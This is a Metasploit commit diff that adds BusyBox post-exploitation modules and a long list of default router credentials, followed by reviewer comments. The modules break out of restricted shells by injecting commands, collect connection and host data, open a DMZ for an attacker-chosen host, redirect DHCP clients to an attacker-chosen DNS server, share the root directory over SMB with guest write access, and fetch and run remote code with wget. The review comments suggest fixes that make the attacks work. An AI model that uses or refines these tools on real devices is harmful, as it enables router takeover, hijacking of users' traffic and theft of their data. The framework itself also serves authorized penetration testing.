mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Added modules to jailbreak and remotely control BusyBox-based devices. Also added a word list with default credentials typically used by commercial routers.

jvicente 2015-08-10 18:29:41 +02:00
parent a611fff7bf
commit 5ff61ca5f3
9 changed files with 1094 additions and 0 deletions


@ -0,0 +1,398 @@
debug synnet
tech tech
adminttd adminttd
admin comcomcom
admin admin
admin synnet
monitor monitor
manager manager
admin password
User Password
Administrator admin
security security
3comcso RIP000
recovery recovery
volition volition
Administrator 3ware
sysadm anicust
Admin admin
none 0
admin secure
kermit kermit
dhs3mt dhs3mt
at4400 at4400
mtch mtch
mtcl mtcl
root letacla
dhs3pms dhs3pms
adfexc adfexc
client client
install llatsni
halt tlah
admin switch
diag switch
root permit
ftp_inst pbxk1064
ftp_admi kilo1987
ftp_oper help1954
ftp_nmc tuxalize
manager friend
manager admin
Manager friend
none admin
admin linga
root root
user user
admin cableroot
acc acc
device device
apc apc
root admin
root alpine
admin 0
IntraSwitch Asante
IntraStack Asante
admin asante
readonly lucenttech2
root ascend
admin epicrouter
customer none
DTA TJM
admin atlantis
root ROOT500
diag danger
manuf xxyyzz
craft crftpw
root cms500
dadmin dadmin01
root pass
admin bintec
admin articon
patrol patrol
webadmin webadmin
installer installer
root fivranne
admin 1234
mediator mediator
root Mau'dib
cellit cellit
admin diamond
cmaker cmaker
admin changeme
netrangr attack
bbsd-client changeme2
bbsd-client NULL
Administrator changeme
root attack
admin default
Cisco Cisco
admin cisco
root blender
hsa hsadb
wlse wlsedb
root Cisco
admin system
user tivonpw
cisco cisco
administrator administrator
user user
operator operator
user public
PFCUser 240653C9467E45
corecess corecess
cgadmin cgadmin
super surt
root tslinux
D-Link D-Link
root tini
anonymous any@
root davox
davox davox
MDaemon MServer
root calvin
admin my_DEMARC
PBX PBX
NETWORK NETWORK
admin michelangelo
user password
draytek 1234
admin 123
login admin
login password
admin netadmin
tiger tiger123
websecadm changeme
netman netman
1111 1111
supervisor supervisor
anonymous Exabyte
root default
admin radius
admin isee
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MGR NETBASE
MGR REGO
MGR RJE
MGR CONV
OPERATOR SYS
OPERATOR DISC
OPERATOR SYSTEM
OPERATOR SUPPORT
OPERATOR COGNOS
PCUSER SYS
RSBCMON SYS
SPOOLMAN HPOFFICE
WP HPOFFICE
ADVMAIL HPOFFICE DATA
ADVMAIL HP
FIELD SUPPORT
FIELD MGR
FIELD SERVICE
FIELD MANAGER
FIELD HPP187 SYS
FIELD LOTUS
FIELD HPWORD PUB
FIELD HPONLY
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT
HELLO OP.OPERATOR
MAIL MAIL
MAIL REMOTE
MAIL TELESUP
MAIL HPOFFICE
MAIL MPE
MANAGER TCH
MANAGER SYS
MANAGER SECURITY
MANAGER ITF3000
MANAGER HPOFFICE
MANAGER COGNOS
MANAGER TELESUP
MGR SYS
MGR CAROLIAN
MGR VESOFT
MGR XLSERVER
MGR SECURITY
MGR TELESUP
MGR HPDESK
MGR CCC
MGR CNAS
MGR WORD
MGR COGNOS
MGR ROBELLE
MGR HPOFFICE
MGR HPONLY
admin hp.com
storwatch specialist
vt100 public
superadmin secret
hscroot abc123
USERID PASSW0RD
Administrator pilou
Administrator letmein
NICONEX NICONEX
setup setup
intel intel
admin hello
admin giraff
SYSDBA masterkey
intermec intermec
operator $chwarzepumpe
system sys
admin operator
admin ironport
JDE JDE
PRODDTA PRODDTA
netscreen netscreen
superuser 123456
admin 123456
sysadmin PASS
login access
comcast 1234
setup changeme
setup changeme!
super super
xxx cascade
admin Ascend
readwrite lucenttech1
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
admin AitbISP4eCiG
bciim bciimpw
bcim bcimpw
bcms bcmspw
bcnas bcnaspw
blue bluepw
browse browsepw
browse looker
craft craft
craft craftpw
cust custpw
enquiry enquirypw
field support
inads indspw
inads inads
init initpw
locate locatepw
maint maintpw
maint rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field
scmadmin scmchangeme
Administrator password
MICRO RSX
service smile
system password
cablecom router
admin motorola
router router
SYSADM sysadm
admin admin123
GlobalAdmin GlobalAdmin
super 5777364
superman 21241036
naadmin naadmin
netopia netopia
admin noway
admin NetCache
e500 e500changeme
e250 e250changeme
guest guest
admin asd
vcr NetVCR
m1122 m1122
telecom telecom
disttech 4tas
maint maint
mlusr mlusr
admin root
l2 l2
l3 l3
ro ro
rw rw
rwa rwa
admin setup
login 0
login 1111
login 8429
spcl 0
root 3ep5w2u
maint ntacdmax
ccrusr ccrusr
supervisor PlsChgMe!
266344 266344
supervisor PlsChgMe1
admin adslolitec
admin OCS
adminstat OCS
adminview OCS
adminuser OCS
helpdesk OCS
sys uplink
cac_admin cacadmin
system sys
manager change_on_install
admin kont2004
Manager Manager
sysadm sysadm
write private
debug d.e.b.u.g
echo echo
PSEAdmin $secure$
admin superuser
admin mu
admin microbusiness
admin smallbusiness
Polycom SpIp
support h179350
lp lp
radware radware
wradmin trancell
piranha q
piranha piranha
sysadmin password
setup changeme
teacher password
temp1 password
admin rmnetlm
admin2 changeme
adminstrator changeme
deskalt password
deskman changeme
desknorm password
deskres password
replicator replicator
RMUser1 password
topicalt password
topicnorm password
topicres password
root 1234
public public
admin w2402
GEN1 gen1
GEN2 gen2
ADMN admn
eng engineer
op op
op operator
su super
poll tech
sysadmin sysadmin
admin pwp
superuser admin
admin hagpolm1
Administrator ganteng
Administrator smcadmin
admin barricade
smc smcadmin
admin smcadmin
cusadmin highspeed
1.79 + Multi
aaa often blank
admin Protector
admin conexant
admin xad$l#12
root changeme
Sweex Mysweex
target password
install secret
super.super master
xbox xbox
telco telco
tellabs tellabs#1
root admin_1
tiara tiaranet
superman talent
admin extendnet
root 12345
cablemodem robotics
NAU NAU
ADMINISTRATOR ADMINISTRATOR
HTTP HTTP
Any 12345
support support
VTech VTech
admin visual
root 123456
CSG SESAME
user pass
admin sysAdmin
root wyse
VNC winterm
rapport r@p8p0r+
1502 1502
xd xd
admin 2222
admin 22222
admin 1111
admin zoomadsl
ZXDSL ZXDSL
1234 1234
webadmin 1234
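Review bot: the list contains duplicate pairs that should be dropped before this ships, and two lines that are not credential pairs at all. `user user` appears twice, as do `setup changeme` and `system sys`; each duplicate costs an extra login attempt per target for no gain. `1.79 + Multi` and `aaa often blank` read like notes copied from a source table rather than username/password pairs, and whatever consumes the file will split them into a bogus user and password. The file also needs a defined delimiter: entries such as `ADVMAIL HPOFFICE DATA`, `FIELD HPP187 SYS` and `FIELD HPWORD PUB` contain three space-separated tokens, so a naive split on whitespace yields three fields for those lines and two for the rest; state the format (for example, first token is the user, remainder is the password) in the module that reads the list.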


@ -0,0 +1,68 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Enumerate Connections',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will enumerate
the connections established by the hosts connected
to the router or device executing BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
found = false
conns_files =[
"/proc/net/nf_conntrack", "/proc/net/ip_conntrack", "/proc/net/tcp", "/proc/net/udp", "/proc/net/arp", "/proc/fcache/*"
]
vprint_status("Searching for files that store information about network connections.")
conns_files.each do |conns_file|
if file_exists(conns_file)
found = true
print_good("Connections File found: #{conns_file}.")
begin
str_file=read_file(conns_file)
vprint_line(str_file)
#Store file
p = store_loot("Connections", "text/plain", session, str_file, conns_file, "BusyBox Device Network Established Connections")
print_good("Connections saved to #{p}.")
rescue EOFError
# If there's nothing in the file, we hit EOFError
print_error("Nothing read from file #{conns_file}, file may be empty.")
end
end
end
if found == false
print_error("Nothing read from connection files, files may be empty.")
end
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end
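Review bot: `file_exists` at the bottom of this hunk treats an empty file as present, because `if s and s.length` is true for a zero-length string (0 is truthy in Ruby); use `s && !s.empty?` instead, otherwise `found` is set and the `EOFError` branch is the only thing that reports the empty file. Two smaller points: `"/proc/fcache/*"` is a glob, so whether it resolves depends on how `read_file` invokes `cat` on a shell session; test it on a real device or list the concrete path. Style-wise, `conns_files =[` and `str_file=read_file(...)` need spaces around `=`, and `if found == false` reads better as `unless found`.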


@ -0,0 +1,63 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Enumerate Hosts',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will enumerate
the hosts connected to the router or device executing
BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
hosts_file = nil
if file_exists("/var/hosts")
hosts_file = "/var/hosts"
elsif file_exists("/var/udhcpd/udhcpd.leases")
hosts_file = "/var/udhcpd/udhcpd.leases"
else
vprint_error("Files not found: /var/hosts, /var/udhcpd/udhcpd.leases.")
return
end
#File exists
begin
str_file=read_file(hosts_file)
print_good("Hosts File found: #{hosts_file}.")
vprint_line(str_file)
#Store file
p = store_loot("Hosts", "text/plain", session, str_file, hosts_file, "BusyBox Device Connected Hosts")
print_good("Hosts saved to #{p}.")
rescue EOFError
# If there's nothing in the file, we hit EOFError
print_error("Nothing read from file: #{hosts_file}, file may be empty.")
end
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end
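Review bot: the `if`/`elsif` chain in `run` collects at most one of the two files, so on a device that has both `/var/hosts` and `/var/udhcpd/udhcpd.leases` the lease file is silently skipped. Iterate over both paths and store each one that is readable, as the Enumerate Connections module in this commit does with its `conns_files` array. The `file_exists` helper is duplicated here with the same `s.length` truthiness issue (an empty string has length 0, which is truthy, so an empty file counts as present); move it to one shared place so it is fixed once.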


@ -0,0 +1,165 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Ping Network',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will ping a range of
ip adresses from the router or device executing BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptAddress.new('IPRANGESTART', [ true, "The first ip address of the range to ping.", nil ]),
OptAddress.new('IPRANGEEND', [ true, "The last ip address of the range to ping.", nil ])
], self.class)
end
def run
#this module will send a sh script for busybox shell for doing ping to a range of ip address from
#the router or device that is executing busybox. It could be possible to calculate each ip address
#of the range of ip addresses in the ruby script and execute each ping command with cmd_exec, but
#it would generate an unnecesary traffic in the connection with the busybox device (usually telnet)
sh_script_lines=[
"#!/bin/sh",
"param1=#{datastore['IPRANGESTART']}",
"param2=#{datastore['IPRANGEEND']}",
"while true;",
" param1cpy=\"$param1\"",
" pos=`expr index \"$param1cpy\" \".\"`",
" pos=`expr $pos - 1`",
" octec1=`expr substr \"$param1cpy\" 1 $pos`",
" pos=`expr $pos + 2`",
" len=`expr length \"$param1cpy\"`",
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
" pos=`expr index \"$param1cpy\" \".\"`",
" pos=`expr $pos - 1`",
" octec2=`expr substr \"$param1cpy\" 1 $pos`",
" pos=`expr $pos + 2`",
" len=`expr length \"$param1cpy\"`",
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
" pos=`expr index \"$param1cpy\" \".\"`",
" pos=`expr $pos - 1`",
" octec3=`expr substr \"$param1cpy\" 1 $pos`",
" pos=`expr $pos + 2`",
" len=`expr length \"$param1cpy\"`",
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
" octec4=\"$param1cpy\"",
" carry=0",
" len=`expr length \"$octec4\"`",
" temp=`expr match \"$octec4\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec4=0",
" carry=1",
" else",
" octec4=`expr $octec4 + 1`",
" fi",
" if [ $carry -eq 1 ]; then",
" carry=0",
" len=`expr length \"$octec3\"`",
" temp=`expr match \"$octec3\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec3=0",
" carry=1",
" else",
" octec3=`expr \"$octec3\" + 1`",
" fi",
" fi",
" if [ $carry -eq 1 ]; then",
" carry=0",
" len=`expr length \"$octec2\"`",
" temp=`expr match \"$octec2\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec2=0",
" carry=1",
" else",
" octec2=`expr $octec2 + 1`",
" fi",
" fi",
" if [ $carry -eq 1 ]; then",
" carry=0",
" len=`expr length \"$octec1\"`",
" temp=`expr match \"$octec1\" \"255\"`",
" if [ $temp -eq $len ]; then",
" octec1=0",
" carry=1",
" else",
" octec1=`expr $octec1 + 1`",
" fi",
" fi",
" ping -c 1 \"$param1\"",
" param1=\"$octec1\"\".\"\"$octec2\"\".\"\"$octec3\"\".\"\"$octec4\"",
" temp=`expr match \"$param1\" \"$param2\"`",
" len=`expr length \"$param2\"`",
" if [ $temp -eq $len ]; then",
" ping -c 1 \"$param1\"",
" break",
" fi",
"done"
]
begin
#send script and receive echos
count=0
sh_script_lines.each do |sh_script_line|
session.shell_write(sh_script_line + "\n")
count+=1
result=session.shell_read() #receive echos
vprint_status(result)
Rex::sleep(0.03)
end
rescue
print_error("Problems were found while sending script to the BusyBox device.")
return
end
Rex::sleep(1.00)
full_results = ""
begin
#receiving ping results
count=0
print_status("Script has been sent to the busybox device. Doing ping to the range of addresses.")
while count<15 #we stop when we have been 15 seconds without receiving responses
result = session.shell_read()
if result.length>0
count=0
print_status(result)
full_results << result
else
vprint_status("No response.")
count+=1
end
Rex::sleep(1.00)
end
rescue
print_warning("Problems were found while receiving ping results. Probably remote device terminated the connection.\nResults that were already received will be kept.")
end
#storing results
p = store_loot("Pingnet", "text/plain", session, full_results, "#{datastore['IPRANGESTART']}"+"-"+"#{datastore['IPRANGEEND']}", "BusyBox Device Network Range Pings")
print_good("Pingnet results saved to #{p}.")
end
end
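Review bot: the embedded script cannot run as written: `"while true;"` near the top of `sh_script_lines` has no `do`, so the shell never sees a `while ... do ... done` loop and reports a syntax error when it reaches `done`. Change the line to `"while true; do"` (or put `do` on its own line before `param1cpy=...`). The loop also only exits when the incremented address matches `IPRANGEEND`, so a range whose end lies below its start never terminates (after 255.255.255.255 the octets all wrap to 0 and the loop continues from 0.0.0.0); validate in Ruby that `IPRANGEEND` is not below `IPRANGESTART` before sending the script, or add an iteration bound. Minor: `count` in the first `begin` block is incremented but never used, and the bare `rescue` clauses hide which exception occurred; log `$!` or rescue a specific class.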


@ -0,0 +1,64 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize
super(
'Name' => 'BusyBox Jailbreak ',
'Description' => 'This module will send a set of commands to a open
session that is connected to a BusyBox limited shell
(i.e. a router limited shell). It will try different
known tricks to try to jailbreak the limited shell and
get a full sh busybox shell.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
bfound = false
bfound = try_command("cat xx || sh\n","1_1") unless bfound
bfound = try_command("ping || sh\n","1_2") unless bfound
bfound = try_command("echo `sh >> /dev/ttyp0`\n","2_1") unless bfound
bfound = try_command("ping `sh >> /dev/ttyp0`\n","2_2") unless bfound
bfound = try_command("cat `sh >> /dev/ttyp0`\n","2_3") unless bfound
bfound = try_command("cat xx;sh\n","3_1") unless bfound
bfound = try_command("echo xx;sh\n","3_2") unless bfound
bfound = try_command("ping;sh\n","3_3") unless bfound
bfound = try_command("cat xx | sh\n","4_1") unless bfound
bfound = try_command("ping | sh\n","4_2") unless bfound
bfound = try_command("cat ($sh)\n","5_1") unless bfound
bfound = try_command("echo ($sh) xx\n","5_2") unless bfound
bfound = try_command("ping ($sh)\n","5_3") unless bfound
bfound = try_command("cat xx &amp;&amp; sh\n","6_1") unless bfound
bfound = try_command("echo xx &amp;&amp; sh\n","6_2") unless bfound
bfound = try_command("ping &amp;&amp; sh\n","3_3") unless bfound
print_error("Unable to jailbreak device shell.") if !bfound
end
def try_command(param_command, method_number)
vprint_status("jailbreak sent: #{param_command}.")
session.shell_write(param_command)
(1..10).each do
resp = session.shell_read()
vprint_status("jailbreak received: #{resp}.")
if ((resp.include? "BusyBox") && (resp.include? "Built-in shell"))
vprint_status("Done method " + method_number + ".")
return true
end
end
return false
end
end
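Review bot: the last `try_command` call in `run` is labelled `"3_3"`, which duplicates the label on the `ping;sh` attempt; it should be `"6_3"` so the verbose `Done method` message identifies which attempt succeeded. Two other things to check: the last three commands show `&amp;&amp;` instead of `&&`, and if that is literally what the file contains an HTML entity is sent to the shell; and the `(1..10).each` loop in `try_command` calls `shell_read` ten times back to back with no delay, so on a slow telnet link all ten reads can return empty before the device answers and the method is reported as failed. Add a short `Rex.sleep` between reads, as the other modules in this commit do.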


@ -0,0 +1,49 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize
super(
'Name' => 'BusyBox Set Dmz',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will enable or disable dmz
to a network host in the router or device executing BusyBox.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options([
OptAddress.new('TARGETHOST', [ true, "The address of the host to be target for the dmz", nil ]),
OptBool.new('DELETE', [false, "If this option is set to true, the DMZ is removed. Else it is added.", false])
], self.class)
end
def run
if datastore['DELETE'] == true
vprint_status("Executing iptables to delete dmz.")
vprint_status(cmd_exec("iptables -D FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
else
vprint_status("Executing iptables to add dmz.")
vprint_status(cmd_exec("iptables -A FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
end
if datastore['VERBOSE']
vprint_status(cmd_exec("iptables --list"))
end
print_good("Dmz modified. Enable verbose for additional information.")
end
end
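Review bot: `run` prints `Dmz modified.` unconditionally, even when `iptables` is missing from the device or the rule change fails, because the output of `cmd_exec` is only passed to `vprint_status`; inspect that output (an error message from `iptables`) before claiming success and report failure with `print_error`, since the closing message tells the operator to enable verbose mode for information that should drive the result. The `datastore['DELETE'] == true` comparison can simply be `if datastore['DELETE']`, and the description should say what "dmz" means here (a FORWARD ACCEPT rule for one host) so users know it does not touch NAT.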


@ -0,0 +1,124 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Set Dns',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will set dns addresses
to the router or device executing BusyBox to be sent
by dhcp server to network hosts.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptAddress.new('SRVHOST', [ true, "The dns server address.", nil ])
], self.class)
end
#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
def run
workdone = false
vprint_status("Searching for files to modify dns server.")
if file_exists("/etc/resolv.conf")
vprint_status("Resolv.conf found.")
if is_writable_and_write("/etc/resolv.conf", "nameserver #{datastore['SRVHOST']}", false)
print_good("Dns server added to resolv.conf.")
workdone = true
end
end
if file_exists("/etc/udhcpd.conf")
vprint_status("Udhcpd.conf found.")
original_content = read_file("/etc/udhcpd.conf")
vprint_status("Original udhcpd.conf content:")
vprint_status(original_content)
if is_writable_and_write("/etc/udhcpd.conf", "option dns #{datastore['SRVHOST']}", false)
vprint_status("Udhcpd.conf is writable.")
is_writable_and_write("/etc/udhcpd.conf", original_content, true)
vprint_status("Relaunching udhcp server:")
cmd_exec("killall dhcpd\n")
cmd_exec("dhcpd /etc/udhcpd.conf &\n")
print_good("Udhcpd.conf modified and dns server added. Dhcpd restarted.")
else
vprint_status("Unable to write udhcpd.conf. Trying to copy the file to a writable directory.")
writable_directory = nil
vprint_.status("Trying to find writable directory.")
writable_directory = "/etc/" if is_writable_and_write("/etc/tmp.conf", "x", false)
writable_directory = "/mnt/" if (!writable_directory && is_writable_and_write("/mnt/tmp.conf", "x", false))
writable_directory = "/var/" if (!writable_directory && is_writable_and_write("/var/tmp.conf", "x", false))
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_and_write("/var/tmp/tmp.conf", "x", false))
if writable_directory
vprint_status("writable directory found, creating a copy of the original udhcpd.conf.")
is_writable_and_write("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", false)
is_writable_and_write("#{writable_directory}tmp.conf", original_content, true)
vprint_status("Relaunching udhcp server:")
cmd_exec("killall dhcpd\n")
cmd_exec("dhcpd #{writable_directory}tmp.conf &\n")
print_good("Udhcpd.conf copied to writable directory and dns server added. Dhcpd restarted.")
workdone = true
else
vprint_error("Writable directory not found.")
end
end
end
if !workdone
print_error("Unable to modify dns server.")
end
end
#This function checks if the target file is writable and writes or append the data given as parameter.
#BusyBox shell's commands are limited and Msf > Post > File > write_file function doesnt work here, for
#this reason it is necessary to implement an specific function
def is_writable_and_write(file_path, data, append)
if append
data = read_file(file_path) + "\n" + data
end
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
session.shell_write("echo #{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
session.shell_read(); Rex::sleep(0.1)
if read_file(file_path).include? rand_str
session.shell_write("echo \"\"> #{file_path}\n"); Rex::sleep(0.1)
session.shell_read(); Rex::sleep(0.1)
lines = data.lines.map(&:chomp)
lines.each do |line|
session.shell_write("echo #{line.chomp} >> #{file_path}\n"); Rex::sleep(0.1)
session.shell_read(); Rex::sleep(0.1)
end
return true
else
return false
end
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end
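Review bot: `vprint_.status("Trying to find writable directory.")` in the fallback branch of `run` is a typo that raises `NoMethodError` as soon as `/etc/udhcpd.conf` turns out to be read-only, so the whole copy-to-writable-directory path is dead until it is changed to `vprint_status`. In the same method, the branch that rewrites `/etc/udhcpd.conf` in place never sets `workdone = true`, so when `resolv.conf` is absent or read-only the module reports `Unable to modify dns server.` after having succeeded. `is_writable_and_write` restores content by echoing each line unquoted (`echo #{line.chomp} >> #{file_path}`): a line beginning with `#`, which is common in `udhcpd.conf`, turns the `>> file` redirection into part of a shell comment and the line is lost, and any `$`, backtick or quote in the original content is interpreted by the shell; single-quote the line (escaping embedded single quotes as `'\''`) or write the file with a heredoc. Finally, the restart runs `killall dhcpd` and `dhcpd ...` while BusyBox's own DHCP server applet is `udhcpd`; confirm the binary name on the target rather than hard-coding `dhcpd`.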


@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Smb Share Root',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will modify the
smb configuration of the the router or device executing
BusyBox to share the root directory of the device.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
vprint_status("Trying to find smb.conf.")
if read_file("/var/samba/smb.conf").length > 0 #file? doesnt work because test -f is not implemented in busybox
vprint_status("Smb.conf found.")
vprint_status("Trying to find writable directory.")
writable_directory = nil
writable_directory = "/etc/" if is_writable_directory("/etc")
writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
if writable_directory
vprint_status("writable directory found, copying smb.conf.")
vprint_status(cmd_exec("rm -f #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("cp -f /var/samba/smb.conf #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("echo -e '[rootdir]\ncomment = rootdir\npath = /\nbrowseable = yes\nwriteable = yes\nguest ok = yes\n' >> #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("killall smbd")); Rex::sleep(0.1)
vprint_status(cmd_exec("smbd -D -s #{writable_directory}smb.conf")); Rex::sleep(0.1)
vprint_status(cmd_exec("smbd -D -s=#{writable_directory}smb.conf")); Rex::sleep(0.1)
print_good("Smb configuration has been modified.")
else
print_error("Writable directory not found.")
end
else
print_error("Smb.conf not found.")
end
end
#This function checks if the target directory is writable
def is_writable_directory(directory_path)
retval = false
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
file_path = directory_path + "/" + rand_str
session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
(1..5).each{session.shell_read(); Rex::sleep(0.1)}
rcv = read_file(file_path)
vprint_status("is_writable_directory:"+rcv)
if rcv.include? (rand_str+"XXX"+rand_str)
retval = true
end
cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
return retval
end
end
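Review bot: `run` starts the daemon twice, once with `smbd -D -s #{writable_directory}smb.conf` and again with `smbd -D -s=#{writable_directory}smb.conf`; pick the form the target's `smbd` accepts instead of launching two instances, and check the output of the first before issuing a second. The `echo -e '[rootdir]\n...'` line is a Ruby double-quoted string, so its `\n` escapes are already real newlines when `cmd_exec` sends the command, and the single-quoted argument arrives as several lines of input to the remote shell; escape them as `\\n` so `echo -e` does the conversion, or append the section with one `echo ... >>` per line. `read_file("/var/samba/smb.conf").length` raises if `read_file` returns `nil`; reuse the `file_exists` helper the other modules in this commit define. `is_writable_directory` is duplicated verbatim in the Wget and Exec module and belongs in one shared place. Typo in the description: `the the router`.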


@ -0,0 +1,89 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize
super(
'Name' => 'BusyBox Wget and Exec',
'Description' => 'This module will be applied on a session connected
to a BusyBox sh shell. The script will use wget to download
a file to the router or device executing BusyBox and then
it executes the download file.',
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://vallejo.cc']
],
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptString.new('URL', [true, 'Full URL of file to download.'])
], self.class)
end
#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
def run
vprint_status("Trying to find writable directory.")
writable_directory = nil
writable_directory = "/etc/" if is_writable_directory("/etc")
writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
if writable_directory
vprint_status("writable directory found, downloading file.")
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
random_file_path = writable_directory + rand_str
cmd_exec("wget -O #{random_file_path} #{datastore['URL']}"); Rex::sleep(0.1)
if file_exists(random_file_path)
print_good("File downloaded using wget. Executing it.")
cmd_exec("chmod 777 #{random_file_path}"); Rex::sleep(0.1)
vprint_status(cmd_exec("sh #{random_file_path}"))
else
print_error("Unable to download file.")
end
else
print_error("Writable directory not found.")
end
end
#This function checks if the target directory is writable
def is_writable_directory(directory_path)
retval = false
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
file_path = directory_path + "/" + rand_str
session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
(1..5).each{session.shell_read(); Rex::sleep(0.1)}
rcv = read_file(file_path)
vprint_status("is_writable_directory:"+rcv)
if rcv.include? (rand_str+"XXX"+rand_str)
retval = true
end
cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
return retval
end
#file? doesnt work because test -f is not implemented in busybox
def file_exists(file_path)
s = read_file(file_path)
if s and s.length
return true
end
return false
end
end
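Review bot: the comment above `run` (`The module tries to update resolv.conf ...`) is copied from the Set Dns module and describes nothing in this file; replace it with a sentence about downloading and executing. Logic-wise, `file_exists` returns true for an empty file (`s.length` is 0, which is truthy in Ruby), and `wget -O path` creates the output file before the transfer begins, so a failed download still leaves an empty file, the check passes, the module prints `File downloaded using wget. Executing it.` and runs `sh` on nothing; test `s && !s.empty?` or inspect wget's output. `datastore['URL']` is also interpolated unquoted into the command, so a URL containing `&` or `;` in its query string is split by the remote shell; single-quote it. The `chmod 777` is unnecessary since the file is run through `sh`, and `is_writable_directory`/`file_exists` are the third copy of these helpers in this commit.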